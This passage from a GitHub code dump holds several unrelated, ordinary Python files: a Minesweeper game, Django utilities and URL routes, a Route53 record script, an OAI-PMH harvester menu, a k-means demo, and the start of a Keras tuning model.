height=4,\r\n            bg='dark gray',\r\n            fg='white',\r\n            font=(\"calibri\", 18)\r\n        )\r\n        Cell.cell_count_label_object = lbl\r\n\r\n    def left_click_actions(self, event):\r\n        if self.is_mine:\r\n            self.show_mine()\r\n        else:\r\n            if self.surrounded_cells_mines_length == 0:\r\n                for c in self.surrounded_cells:\r\n                    c.show_cell()\r\n            self.show_cell()\r\n            if Cell.cell_count == settings.NR_MINES:\r\n                ctypes.windll.user32.MessageBoxW(\r\n                    0,\r\n                    'Congratulations! 
You won the game!',\r\n                    'YOU WON',\r\n                    0\r\n                )\r\n                sys.exit()\r\n\r\n    def get_cell_by_axis(self, x, y):\r\n        for c in Cell.all:\r\n            if c.x == x and c.y == y:\r\n                return c\r\n\r\n    @property # read only\r\n    def surrounded_cells(self):\r\n        cells = [\r\n            self.get_cell_by_axis(self.x - 1, self.y - 1),\r\n            self.get_cell_by_axis(self.x - 1, self.y),\r\n            self.get_cell_by_axis(self.x - 1, self.y + 1),\r\n            self.get_cell_by_axis(self.x, self.y - 1),\r\n            self.get_cell_by_axis(self.x + 1, self.y - 1),\r\n            self.get_cell_by_axis(self.x + 1, self.y),\r\n            self.get_cell_by_axis(self.x + 1, self.y + 1),\r\n            self.get_cell_by_axis(self.x, self.y + 1)\r\n        ]\r\n        cells = [x for x in cells if x is not None]\r\n        return cells\r\n\r\n    @property # read only\r\n    def surrounded_cells_mines_length(self):\r\n        counter = 0\r\n        for x in self.surrounded_cells:\r\n            if x.is_mine:\r\n                counter += 1\r\n        return counter\r\n\r\n    def show_cell(self):\r\n        if not self.is_opened:\r\n            Cell.cell_count -= 1\r\n            self.cell_button_object.configure(\r\n                text=f'{self.surrounded_cells_mines_length}',\r\n                background='SystemButtonFace'\r\n            )\r\n            if Cell.cell_count_label_object:\r\n                Cell.cell_count_label_object.configure(\r\n                    text=f\"Cells Left:{Cell.cell_count}\"\r\n                )\r\n            self.is_opened = True\r\n\r\n    def show_mine(self):\r\n        # self.cell_button_object.configure(bg='red')\r\n        Cell.cell_count_label_object.configure(\r\n            text=f\"###############\"\r\n        )\r\n        ctypes.windll.user32.MessageBoxW(\r\n            0,\r\n            'You clicked on a mine',\r\n            'GAME OVER',\r\n            0\r\n        )\r\n        sys.exit()\r\n\r\n    def right_click_actions(self, event):\r\n        if not self.is_marked and not self.is_opened:\r\n            self.cell_button_object.configure(bg='orange')\r\n            self.is_marked = True\r\n        else:\r\n            self.cell_button_object.configure(bg='SystemButtonFace')\r\n            self.is_marked = False\r\n        if self.is_opened:\r\n            self.is_marked = False\r\n\r\n    @staticmethod\r\n    def random_mines():\r\n        picked_cells = random.sample(\r\n            Cell.all,\r\n            settings.NR_MINES\r\n        )\r\n        print(picked_cells)\r\n        for picked_cell in picked_cells:\r\n            picked_cell.is_mine = True\r\n\r\n    def __repr__(self):\r\n        return f'Cell({self.x},{self.y})'\r\n","repo_name":"bogdiz/Minesweeper","sub_path":"cell.py","file_name":"cell.py","file_ext":"py","file_size_in_byte":4248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"35959418054","text":"import os, pytz\nfrom django.core.files.storage import default_storage\nfrom django.db.models import FileField\n\nfrom datetime import datetime\nfrom django.utils import timezone\nfrom datetime import timezone as tz\n# Adapted from file cleanup function created by Tim Kamanin at https://timonweb.com/django/cleanup-files-and-images-on-model-delete-in-django/\ndef file_cleanup(sender, **kwargs):\n    \"\"\"\n    File cleanup callback used to emulate the old delete\n    behavior using signals. 
Initially django deleted linked\n files when an object containing a File/ImageField was deleted.\n\n Usage:\n >>> from django.db.models.signals import post_delete\n >>> post_delete.connect(file_cleanup, sender=MyModel, dispatch_uid=\"mymodel.file_cleanup\")\n \"\"\"\n\n for field in sender._meta.get_fields():\n\n fieldname = field.name\n if field and isinstance(field, FileField):\n inst = kwargs[\"instance\"]\n f = getattr(inst, fieldname)\n m = inst.__class__._default_manager\n if (\n hasattr(f, \"path\")\n and os.path.exists(f.path)\n and not m.filter(\n **{\"%s__exact\" % fieldname: getattr(inst, fieldname)}\n ).exclude(pk=inst._get_pk_val())\n ):\n try:\n default_storage.delete(f.path)\n except:\n pass\n\n# makes the inputs of forms timezone aware and converts them from local time to UTC to maintain database uniformity\ndef apply_tz_offset(date, time):\n\n # for some reason there is discrepancy between this time converted to UTC and the inputted time\n # (eg: time inputted from Americas/St. Lucia gets 24 minutes added to it). This might be part of daylight savings\n if date and time:\n this_datetime = datetime.combine(date, time)\n std_time = this_datetime.astimezone(tz.utc)\n print(std_time.date(), std_time.time())\n return std_time","repo_name":"TheLostHermit/MIM3","sub_path":"MIM3/Forum/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"21054033975","text":"import boto3\n\n# Crea un cliente de Route53\nroute53_client = boto3.client('route53')\n\n# Define los parámetros del registro\nhosted_zone_id = 'Z02608501GXHZ4F42FBXM'\n#record_name = 'test.reno.poc.vficloud.net'\nvalue = '10.0.0.2'\n\nrecords_to_modify = [\n {\n 'record_name': 'test.reno.poc.vficloud.net',\n 'elb_arn': value\n },\n {\n 'record_name': 'test1.reno.poc.vficloud.net',\n 'elb_arn': value\n }\n]\n\nfor record in records_to_modify:\n # Crea el registro con la política de enrutamiento ponderado\n change_batch = {\n 'Comment': 'Creando un registro con enrutamiento ponderado',\n 'Changes': [\n {\n 'Action': 'CREATE',\n 'ResourceRecordSet': {\n 'Name': record['record_name'],\n 'Type': 'A',\n 'TTL': 300,\n 'ResourceRecords': [\n {\n 'Value': value\n }\n ]\n }\n }\n ]\n }\n\n # Crea los registros en Route53\n response = route53_client.change_resource_record_sets(\n HostedZoneId=hosted_zone_id,\n ChangeBatch=change_batch\n )\n\n print(f'Registro {record[\"record_name\"]} creado exitosamente.')\n","repo_name":"israel870730/python3","sub_path":"Boto3/Route53/1.1-CreateRecords-ResourceRecords.py","file_name":"1.1-CreateRecords-ResourceRecords.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"7833867508","text":"import os\nimport time\nimport re\nimport yaml\nimport sys\nfrom colorama import Fore, Style\nimport requests\nfrom typing import List, Union\nfrom requests.adapters import HTTPAdapter\nfrom urllib3.util.retry import Retry\nimport urllib\nfrom lxml import etree\n\nURLREGEX = r\"https?:\\/\\/(www\\.)?[-a-zA-Z0-9@:%._\\+~#=]{1,256}\\.[a-zA-Z0-9()]{1,6}\\b([-a-zA-Z0-9()@:%_\\+.~#?&//=]*)\"\n\n\ndef interactiveMode(session):\n userInput = \"bad\"\n while userInput == \"bad\":\n howTostart = input(\n \"Bitte wählen Sie eine Option:\\n\\n- [N]ormales Harvesting\\n- Harvesting von Records per [I]D-File\\n- Harvesten von Identifiern fortsetzen mit einem [R]esumptionToken\\n- Anzeige aller auf 
der Schnittstelle vorhandener [S]ets\\n- Programm verlassen mit [E]xit\\n => \"\n )\n if howTostart == \"N\":\n userInput = \"good\"\n resumptiontoken = None\n idfile = None\n baseurl = input(\"Base-URL: \")\n validurl = re.search(URLREGEX, baseurl)\n # https://regex101.com/r/2CCthx/1\n while validurl is None:\n baseurl = input(\"Bitte geben Sie eine valide Base-URL ein: \")\n validurl = re.search(URLREGEX, baseurl)\n mprefix = input(\"Metadata Prefix: \")\n while mprefix == \"\":\n mprefix = input(\"Metadata Prefix: \")\n datengeber = input(\"Datengeber: \")\n if datengeber == \"\":\n datengeber = time.strftime(\"%Y%m%d%H%M%S\")\n outputfolder = input(\"Ordner in den geharvestet werden soll: \")\n if outputfolder == \"\":\n outputfolder = os.getcwd()\n oaiset = input(\"Set(s) kommagetrennt ohne Leerzeichen: \")\n if oaiset == \"\":\n oaiset = None\n else:\n oaiset = oaiset.split(\",\")\n fromdate = input(\"Fromdate: \")\n if fromdate == \"\":\n fromdate = None\n untildate = input(\"Untildate: \")\n if untildate == \"\":\n untildate = None\n numberofprocesses = input(\"Anzahl an parallelen Downloads (default: 16): \")\n if numberofprocesses == \"\":\n numberofprocesses = 16\n else:\n numberofprocesses = int(numberofprocesses)\n elif howTostart == \"I\":\n userInput = \"good\"\n resumptiontoken = None\n fromdate = None\n untildate = None\n idfile = input(\"idfile: \")\n while idfile == \"\":\n idfile = input(\"Bitte geben Sie eine valide ID-Datei an: \")\n while os.path.exists(idfile) == False:\n print(\"-> Die ID Datei konnte nicht geladen werden\")\n idfile = input(\n f\"Bitte geben Sie den Pfad zu einer validen ID-Datei an (relativ zum aktuellen Pfad '{os.getcwd()}' oder absolut): \"\n )\n # baseurl und prefix aus der id-Datei auslesen weil die ja jetzt YAML ist und Metadaten enthält\n try:\n # Wir parsen das IDfile später nochmal, daher hier nur die ersten Zeilen (falls das ID File zu groß ist)\n ymlfile = open(idfile, \"r\", encoding=\"utf-8\")\n lines = ymlfile.read().splitlines()[2:5]\n baseurl = re.sub(r\"\\/\\s$\", \"\", lines[0].split(\": \")[1])\n oaiset = lines[1].split(\": \")[1]\n mprefix = lines[2].split(\": \")[1]\n except:\n sys.exit(\"Konnte YAML Datei nicht laden\")\n validurl = re.search(URLREGEX, baseurl)\n while validurl is None:\n baseurl = input(\"Bitte geben Sie eine valide Base-URL ein: \")\n validurl = re.search(URLREGEX, baseurl)\n while mprefix == \"\":\n mprefix = input(\"Metadata Prefix: \")\n datengeber = input(\"Datengeber: \")\n if datengeber == \"\":\n datengeber = time.strftime(\"%Y%m%d%H%M%S\")\n outputfolder = input(\"Ordner in den geharvestet werden soll: \")\n if outputfolder == \"\":\n outputfolder = os.getcwd()\n numberofprocesses = input(\"Anzahl an parallelen Downloads (default: 16): \")\n if numberofprocesses == \"\":\n numberofprocesses = 16\n else:\n numberofprocesses = int(numberofprocesses)\n elif howTostart == \"R\":\n userInput = \"good\"\n idfile = None\n oaiset = None\n fromdate = None\n untildate = None\n baseurl = input(\"Base-URL: \")\n validurl = re.search(URLREGEX, baseurl)\n while validurl is None:\n baseurl = input(\"Bitte geben Sie eine valide Base-URL ein: \")\n validurl = re.search(URLREGEX, baseurl)\n mprefix = input(\"Metadata Prefix: \")\n while mprefix == \"\":\n mprefix = input(\"Metadata Prefix: \")\n resumptiontoken = input(\"Resumption Token: \")\n while resumptiontoken == \"\":\n resumptiontoken = input(\"Resumption Token: \")\n datengeber = input(\"Datengeber: \")\n if datengeber == \"\":\n datengeber = 
time.strftime(\"%Y%m%d%H%M%S\")\n outputfolder = input(\"Ordner in den geharvestet werden soll: \")\n if outputfolder == \"\":\n outputfolder = os.getcwd()\n numberofprocesses = input(\"Anzahl an parallelen Downloads (default: 16): \")\n if numberofprocesses == \"\":\n numberofprocesses = 16\n else:\n numberofprocesses = int(numberofprocesses)\n elif howTostart == \"S\":\n userInput = \"good\"\n baseurl = input(\"Base-URL: \")\n validurl = re.search(URLREGEX, baseurl)\n while validurl is None:\n baseurl = input(\"Bitte geben Sie eine valide Base-URL ein: \")\n validurl = re.search(URLREGEX, baseurl)\n getInfos(baseurl, session)\n elif howTostart == \"E\":\n sys.exit(\"Programm beendet.\")\n else:\n userInput = \"bad\"\n print(\n \"\\n-> Die Eingabe wurde nicht verstanden, geben Sie bitte entweder die Großbuchtsaben N, I, S oder R ein oder E zum Beenden des Programms.\"\n )\n\n timeout = input(\"Timeout in Sekunden: \")\n if timeout == \"\":\n timeout = 0\n else:\n timeout = timeout\n debug = False\n configmode = False\n\n return (\n baseurl,\n mprefix,\n datengeber,\n oaiset,\n fromdate,\n untildate,\n idfile,\n resumptiontoken,\n float(timeout),\n debug,\n configmode,\n outputfolder,\n numberofprocesses,\n )\n\n\ndef getInfos(baseurl, session):\n # baseurl Parameter löschen, falls fälschlicherweise übergeben\n baseurl = re.sub(r\"(\\?.+)\", \"\", baseurl)\n try:\n session.get(baseurl, verify=False, timeout=(20, 80))\n except requests.exceptions.HTTPError:\n input(\n f\"--------------------------------------\\n{Fore.RED}Fehlermeldung:\\n {Style.DIM}Die Schnittstelle ist nicht erreichbar.\\n{Style.RESET_ALL}Drücken Sie Enter zum Beenden...\"\n )\n if input != \"\":\n print(\"Die Schnittstelle ist nicht erreichbar. Breche ab.\")\n sys.exit()\n except requests.exceptions.ConnectionError:\n input(\n f\"--------------------------------------\\n{Fore.RED}Fehlermeldung:\\n {Style.DIM}Die Schnittstelle ist nicht erreichbar.\\n{Style.RESET_ALL}Drücken Sie Enter zum Beenden...\"\n )\n if input != \"\":\n sys.exit()\n else:\n pass\n # leeres Dictionary aufmachen\n sets = {}\n prefixes = []\n\n def getSets(url):\n\n response = session.get(url, verify=False, timeout=(20, 80))\n try:\n response.headers[\"Content-Type\"]\n except:\n pass\n else:\n if \"xml\" not in response.headers[\"Content-Type\"]:\n print(\n f\"Abruf der OAI-Sets: Wahrscheinlich kein valides XML im Return der Schnittstelle ({url}) (Content-Type ohne XML)\"\n )\n namespaces = {\"oai\": \"http://www.openarchives.org/OAI/2.0/\"}\n errors = re.findall(r\"error\\scode=['\\\"](.+)['\\\"]>(.*)<\\/error\", response.text)\n if errors:\n print(f\"Fehler: {errors[0][0]} Abbruch.\")\n input(\n f\"{Fore.RED} Fehler: {Style.DIM} {errors[0][0]} {Style.RESET_ALL} \\n--------------------------------------\\nDrücken Sie Enter zum Beenden...\"\n )\n if input != \"\":\n sys.exit()\n else:\n try:\n root = etree.XML(response.content)\n lmxlsets = root.findall(f\".//oai:set\", namespaces)\n for s in lmxlsets:\n spec = s.findall(f\".//oai:setSpec\", namespaces)[0].text\n name = s.findall(f\".//oai:setName\", namespaces)[0].text\n if spec and name != None:\n if name in sets:\n # print(f\"Set '{name}' mehr als einmal auf der Schnittstelle angegeben\")\n pass\n else:\n sets[name] = spec\n else:\n pass\n\n # ResumptionTokens\n\n token = root.findall(f\".//oai:resumptionToken\", namespaces)\n try:\n token = token[0].text\n except:\n pass\n else:\n # URL encode den resumptionToken (siehe https://gitlab.gwdg.de/maps/harvester/-/issues/25)\n if token:\n 
token = urllib.parse.quote_plus(token)\n                            nexturl = (\n                                re.sub(r\"&resumptionToken=.+\", \"\", url)\n                                + \"&resumptionToken=\"\n                                + token\n                            )\n                            getSets(nexturl)\n            except etree.XMLSyntaxError as e:\n                print(\n                    f\"Fehler beim ermitteln der OAI Sets. Syntaxfehler im Return: {e}\"\n                )\n                pass\n\n    def getprefixes(baseurl):\n\n        url = baseurl + \"?verb=ListMetadataFormats\"\n        response = session.get(url, verify=False, timeout=(20, 80))\n        try:\n            response.headers[\"Content-Type\"]\n        except:\n            pass\n        else:\n            if \"xml\" not in response.headers[\"Content-Type\"]:\n                print(\n                    f\"Abruf der OAI-Metadaten-Prefixe: Wahrscheinlich kein valides XML im Return der Schnittstelle ({url}) (Content-Type ohne XML)\"\n                )\n        for prefix in re.findall(\n            r\"<metadataPrefix>(.*?)<\\/metadataPrefix>\", response.text\n        ):\n            prefixes.append(prefix)\n        if len(prefixes) > 0:\n            print(\n                f\"--------------------------------------\\nAuf der Schnittstelle {baseurl} sind folgende Metadaten-Prefixe registriert: \\n--------------------------------------\"\n            )\n            for i in sorted(prefixes):\n                print(i)\n        else:\n            print(\n                f\"--------------------------------------\\nFür die Schnittstelle {baseurl} konnten keine Metadaten-Prefixe ermittelt werden.\\n--------------------------------------\"\n            )\n\n    getprefixes(baseurl)\n    getSets(baseurl + \"?verb=ListSets\")\n\n    if len(sets) != 0:\n        print(\n            \"--------------------------------------\\nAuf der Schnittstelle sind folgende Sets [setspec] vorhanden: \\n--------------------------------------\"\n        )\n        for key in sorted(sets.keys(), key=lambda x: x.lower()):\n            print(f\"{key} [{sets[key]}]\")\n        input(\n            \"--------------------------------------\\nDrücken Sie Enter zum Beenden...\"\n        )\n        if input != \"\":\n            sys.exit()\n    else:\n        input(\n            \"--------------------------------------\\nKeine Sets gefunden, ist die URL korrekt? Drücken Sie Enter zum Beenden...\"\n        )\n        if input != \"\":\n            sys.exit()\n","repo_name":"Deutsche-Digitale-Bibliothek/ddblabs-ometha","sub_path":"ometha/tui.py","file_name":"tui.py","file_ext":"py","file_size_in_byte":12156,"program_lang":"python","lang":"de","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"406468156","text":"\"\"\"house_app URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n    https://docs.djangoproject.com/en/4.0/topics/http/urls/\nExamples:\nFunction views\n    1. Add an import: from my_app import views\n    2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n    1. Add an import: from other_app.views import Home\n    2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n    1. Import the include() function: from django.urls import include, path\n    2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\n\nfrom django.contrib import admin\nfrom django.urls import path, include\n# from house_app_users import urls as houseAppURLs\n# from house_app import house_app_users\n# from administration import views\nfrom users.views import signup, signin, signout, users,UserInfoListView,UserInfoDetailView, UserInfoView,UserInfoDetailsView,UserViewSet\nfrom pages.views import home_view\nfrom rooms.views import RoomAssignDetailView,RoomListView, RoomsView, RoomsAssignView,TenantRoomView,JoinRoomView, MonthlyTenantView, show\nfrom expenses.views import UtilitiesView, MonthlyDueView, TotalDuePerMonthView, MonthlyDuePerTenantView,TotalDuePerMonthDetailView, MonthlyTotalView, monthlydues\nfrom credits.views import CreditView, OtherCreditView\nfrom accounts.views import AccountView,AccountDetailView\n\nfrom house_app_users.views import MyTokenObtainPairView, RegisterView, testEndPoint, MyTokenRefresh\n\nfrom rest_framework import routers\nfrom rest_framework_simplejwt.views import (\n    TokenRefreshView,\n)\n\nrouter = routers.DefaultRouter()\n# router.register(r'login', UserViewSet, 'login')\nrouter.register(r'users', UserInfoView, basename='users')\n# router.register(r'users/', UserInfoDetailsView, 'user')\nrouter.register(r'rooms', RoomsView, 'rooms')\nrouter.register(r'roomassign', RoomsAssignView, 'roomassign')\nrouter.register(r'joinroom', JoinRoomView, 'joinroom')\nrouter.register(r'tenant', TenantRoomView, 'tenant')\nrouter.register(r'expenses', UtilitiesView, 'expenses')\nrouter.register(r'monthlytenant', MonthlyTenantView, 'monthly_tenant')\nrouter.register(r'monthlydue', MonthlyDueView, 'monthly_due')\nrouter.register(r'totalduepermonth', TotalDuePerMonthView, 'total_monthly_due')\nrouter.register(r'duepertenant', MonthlyDuePerTenantView, 'total_monthly_due_per_Tenant')\nrouter.register(r'credits', CreditView, 'credits')\nrouter.register(r'othercredit', OtherCreditView, 'othercredit')\nrouter.register(r'accounts', AccountView, 'accounts')\nrouter.register(r'monthlytotal', MonthlyTotalView, 'monthly_total')\n# router.register(r'token', MyTokenObtainPairView, 'token_obtain_pair'),\nrouter.register(r'token/refresh', MyTokenRefresh, 'token_refresh'),\nrouter.register(r'register', RegisterView, 'auth_register')\n# router.register(\n#     r'token', MyTokenObtainPairView, basename=\"token\")\n\n\nadditional_routes = [\n    'token/',\n    'register/',\n    'token/refresh/'\n]\n\nurlpatterns = [\n    path('admin/', admin.site.urls),\n    # path('api/', include(houseAppURLs.urlpatterns)),\n    path('api/', include(router.urls)),\n    path('api/token/', MyTokenObtainPairView.as_view(), name='token_obtain_pair'),\n    # path('api/token/refresh/', TokenRefreshView.as_view(), name='token_refresh'),\n    # path('api/register/', RegisterView.as_view(), name='auth_register'),\n    path('api/test/', testEndPoint, name='test'),\n    path('', home_view, name='home'),\n    path('home/', home_view, name='home'),\n    # path('users/', include('users.urls')),\n    path('users/', users),\n    path('users/signup/', signup, name='signup'),\n    path('users/signin/', signin, name='login'),\n    path('users/signout/', signout, name='logout'),\n    path('', UserInfoListView.as_view(), name='userinfo-list'),\n    path('users/<int:pk>/', UserInfoDetailView.as_view(), name='userinfo-detail'),\n    path('rooms/', RoomListView.as_view(), name='room-list'),\n    path('rooms/show', show, name='show'),\n    path('rooms/<int:pk>/', RoomAssignDetailView.as_view(), name='room-detail'),\n    path('expenses/', TotalDuePerMonthDetailView.as_view(), 
name='utility-detail'),\n    path('expenses/monthlydues', monthlydues, name='monthlydues'),\n    path('accounts/<int:pk>/', AccountDetailView.as_view(), name='account-detail'),\n\n]\n\n","repo_name":"ccsf-house-management-app/house-management-app","sub_path":"house_app/house_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"10255402880","text":"import pygame\nfrom vector import rotated_left, rotated_right\n\ndef ai_interface(sim, net):\n    input = sim.are_moves_valid() + sim.new_food_distances()\n    # print(sim.new_coll_distances(), sim.extra_coll_distances())\n    action = net.activate(input)\n    sim.actuator(action)\n    sim.move_snake()\n    \n\ndef human_interface(sim, net=None):\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            sim.finished = True\n        if event.type == pygame.KEYDOWN:\n            if event.key == pygame.K_q:\n                sim._snake.turn_right()\n            elif event.key == pygame.K_e:\n                sim._snake.turn_left()","repo_name":"JanFidor/SnakePythonNEAT","sub_path":"snake_interfaces.py","file_name":"snake_interfaces.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"41989093552","text":"class Node:\n    def __init__(self, data):\n        self.data = data\n        self.next = None\n\nclass LinkedList:\n    def __init__(self):\n        self.head = None\n        self.last = None\n\n    def append(self, new_data):\n        new_node = Node(new_data)\n\n        if(self.head == None):\n            self.head = new_node\n        else:\n            self.last.next = new_node\n        self.last = new_node\n\n\n\n    def deleteNode(self, val):\n        temp = self.head\n\n        if(temp is not None):\n            if(temp.data == val):\n                self.head = temp.next\n                temp = None\n                return\n\n        while temp is not None:\n            if(temp.data == val):\n                break\n            prev = temp\n            temp = temp.next\n\n        if (temp == None):\n\n            return\n\n        prev.next = temp.next\n        temp = None\n\n\n\n\n\n\n    def printList(self):\n        temp = self.head\n        while(temp):\n            print(\" %d \" % (temp.data))\n            temp = temp.next\n\n\nif __name__ == '__main__':\n    llist = LinkedList()\n    llist.append(1)\n    llist.append(2)\n    llist.append(3)\n    llist.append(4)\n    llist.append(5)\n    llist.append(6)\n\n    print(\"Linkedlist is : \")\n    llist.printList()\n\n    llist.deleteNode(6)\n\n    print(\"Linkedlist after val removal :\")\n    llist.printList()\n\n\n\n\n\n\n\n","repo_name":"lionfreak007/self_practice","sub_path":"Lkdlst_remv.py","file_name":"Lkdlst_remv.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"7609109941","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.io import loadmat\n\ndata = loadmat('ex7data2.mat') # loading the data points.\nA = data['X']\n\npoints = np.array(A)\n\nclusters = 3 # no. 
of clusters.\n\nmeans = np.zeros((clusters, 2)) # means or centroids.\n\nfor i in range(clusters):\n\trand1 = int(np.random.random(1)*10)\n\trand2 = int(np.random.random(1)*8)\n\tmeans[i, 0] = points[rand1, 0]\n\tmeans[i, 1] = points[rand2, 1]\n\ndef distance(x1, y1, x2, y2):\n\tdist = np.sqrt(np.square(x1 - x2) + np.square(y1 - y2))\n\treturn dist\n\nflag = 10\n\nindex = np.zeros(A.shape[0])\n\n#k-means algorithm.\n\nwhile(flag > 0):\n\tfor j in range(len(points)):\n\t\tminv = 1000\n\t\ttemp = -1\n\t\tfor k in range(clusters):\n\t\t\tx1 = points[j, 0]\n\t\t\ty1 = points[j, 1]\n\t\t\tx2 = means[k, 0]\n\t\t\ty2 = means[k, 1]\n\t\t\tif(distance(x1, y1, x2, y2) < minv):\n\t\t\t\tminv = distance(x1, y1, x2, y2)\n\t\t\t\ttemp = k\n\t\t\t\tindex[j] = k\t\n\t\n\tfor k in range(clusters):\n\t\tsumx = 0\n\t\tsumy = 0\n\t\tcount = 0\n\t\tfor j in range(len(points)):\n\t\t\tif(index[j] == k):\n\t\t\t\tsumx += points[j, 0]\n\t\t\t\tsumy += points[j, 1] \n\t\t\t\tcount += 1\n\t\tif(count == 0):\n\t\t\tcount = 1\t\t\n\t\tmeans[k, 0] = float(sumx/count)\n\t\tmeans[k, 1] = float(sumy/count)\t\t\n\t\t\n\t\t'''\n\t\tplt.scatter(points[:, 0], points[:, 1])\n\t\tplt.scatter(means[:, 0], means[:, 1])\n\t\tplt.show()\n\t\t'''\n\tflag -= 1\n\n\ncluster1 = points[np.where(index == 0)[0],:] \ncluster2 = points[np.where(index == 1)[0],:] \ncluster3 = points[np.where(index == 2)[0],:]\n\n#plotting the clusters.\n\nfig, ax = plt.subplots(figsize=(12,8)) \nax.scatter(cluster1[:,0], cluster1[:,1], s=30, color='r', label='Cluster 1') \nax.scatter(cluster2[:,0], cluster2[:,1], s=30, color='g', label='Cluster 2') \nax.scatter(cluster3[:,0], cluster3[:,1], s=30, color='b', label='Cluster 3') \nax.legend() \nplt.show()\n","repo_name":"adithbharadwaj/Machine-Learning","sub_path":"clustering/k-means.py","file_name":"k-means.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"6640696632","text":"import turtle\r\nimport random\r\n\r\n# Set up the canvas\r\nturtle.title(\"Turtle\")\r\n\r\n# Draw a triangle\r\nt = turtle.Turtle()\r\nt.speed(0)\r\nt.penup()\r\nt.goto(-800, -400)\r\nt.pendown()\r\nfor i in range(100):\r\n # Generate a random hex color\r\n color = '#%06x' % random.randint(0, 0xFFFFFF)\r\n t.color(color, color)\r\n t.begin_fill()\r\n t.circle(50, steps=3+i)\r\n t.end_fill()\r\n t.penup()\r\n # Move up 30\r\n if t.pos()[1] >= 300:\r\n t.goto(t.pos()[0]+150, -400)\r\n else:\r\n t.goto(t.pos()[0], t.pos()[1]+150)\r\n t.pendown()\r\n\r\nturtle.done()","repo_name":"Bluebear645/school","sub_path":"4-3일 수업.py","file_name":"4-3일 수업.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"42758974099","text":"import csv\r\nimport numpy as np\r\nimport sys, string\r\nimport nltk\r\nfrom numpy.lib.function_base import append\r\nfrom PreProcesssHPData import vectorize\r\nnltk.download('averaged_perceptron_tagger')\r\n\r\n\r\ndef main():\r\n wordsFile = sys.argv[1]\r\n output = sys.argv[2]\r\n vocabFile = sys.argv[3]\r\n timeFile = sys.argv[4]\r\n\r\n vocab = []\r\n with open(vocabFile, 'r', encoding=\"utf8\") as vf:\r\n for line in vf:\r\n vocab.append(line.strip())\r\n\r\n timeToWordDict = {}\r\n with open(wordsFile, 'r') as wf:\r\n reader = csv.reader(wf)\r\n for row in reader:\r\n timeToWordDict[float(row[1])] = row[0]\r\n\r\n TRs = []\r\n with open(timeFile, 'r') as f:\r\n reader = csv.reader(f)\r\n for row in reader:\r\n 
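# each row's first column is a TR onset time; collect them in order\r\n            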
TRs.append(row[0])\r\n    \r\n    lines = []\r\n    for i in range(len(TRs)):\r\n        currTR = [float(tr) for tr in TRs[i-4:i]]\r\n        wordIndexes = []\r\n        for tr in currTR:\r\n            wordIndexes.extend([tr, tr+0.5, tr+1, tr+1.5])\r\n        line = []\r\n        for idx in wordIndexes:\r\n            if idx in timeToWordDict.keys():\r\n                line.append(timeToWordDict[idx].lower())\r\n            else:\r\n                line.append('NIL')\r\n        line = ' '.join(line)\r\n        line = line.translate(str.maketrans('', '', string.punctuation))\r\n        currTokens = nltk.pos_tag(nltk.wordpunct_tokenize(line))\r\n        line = [word for (word,_) in currTokens]\r\n        if len(line) > 16:\r\n            line = line[:17]\r\n        lines.append(line)\r\n    x = vectorize(lines, vocab, 16)\r\n    print(len(x))\r\n\r\n    x = np.array(x)\r\n    np.save(output, x)\r\n\r\nif __name__ == \"__main__\":\r\n    main()","repo_name":"HonestPretzels/CMPUT-652-BMTM","sub_path":"src/utility/MakeHPXData.py","file_name":"MakeHPXData.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"75008151503","text":"import os\nimport time\n\nimport absl.logging\nimport keras_tuner as kt\nimport tensorflow as tf\nfrom keras.callbacks import EarlyStopping\nfrom keras.layers import Dense, Dropout\nfrom keras.losses import MeanSquaredError\nfrom keras.models import Sequential, load_model\nfrom keras.optimizers import Adam\nfrom sklearn.model_selection import TimeSeriesSplit\nimport matplotlib.pyplot as plt\n\nfrom models.configuration.basic_nn_config import BasicNNConfig\nfrom models.i_model import IModel\nfrom performance_analysis import cross_val_metrics, get_metrics, make_csvs\n\n\nclass BasicNNModel(IModel):\n    \"\"\"\n    _description_\n    \"\"\"\n\n    MODEL_NAME = \"Basic_nn\"\n\n    @staticmethod\n    def kt_model(hp: kt.HyperParameters, config: BasicNNConfig) -> Sequential:\n        \"\"\"\n        _description_\n\n        :param hp: _description_\n        :param config: _description_\n        :return: _description_\n        \"\"\"\n        hp_activation = hp.Choice(\"activation\", values=config.activation)\n        hp_learning_rate = hp.Float(\n            \"lr\",\n            min_value=config.learning_rate_min,\n            max_value=config.learning_rate_max,\n            sampling=config.learning_rate_sampling,\n        )\n        hp_dropout = hp.Float(\n            \"dropout\",\n            min_value=config.dropout_min,\n            max_value=config.dropout_max,\n            sampling=config.dropout_sampling,\n        )\n        hp_neuron_pct = hp.Float(\n            \"NeuronPct\",\n            min_value=config.neuron_pct_min,\n            max_value=config.neuron_pct_max,\n            sampling=config.neuron_pct_sampling,\n        )\n        hp_neuron_shrink = hp.Float(\n            \"NeuronShrink\",\n            min_value=config.neuron_shrink_min,\n            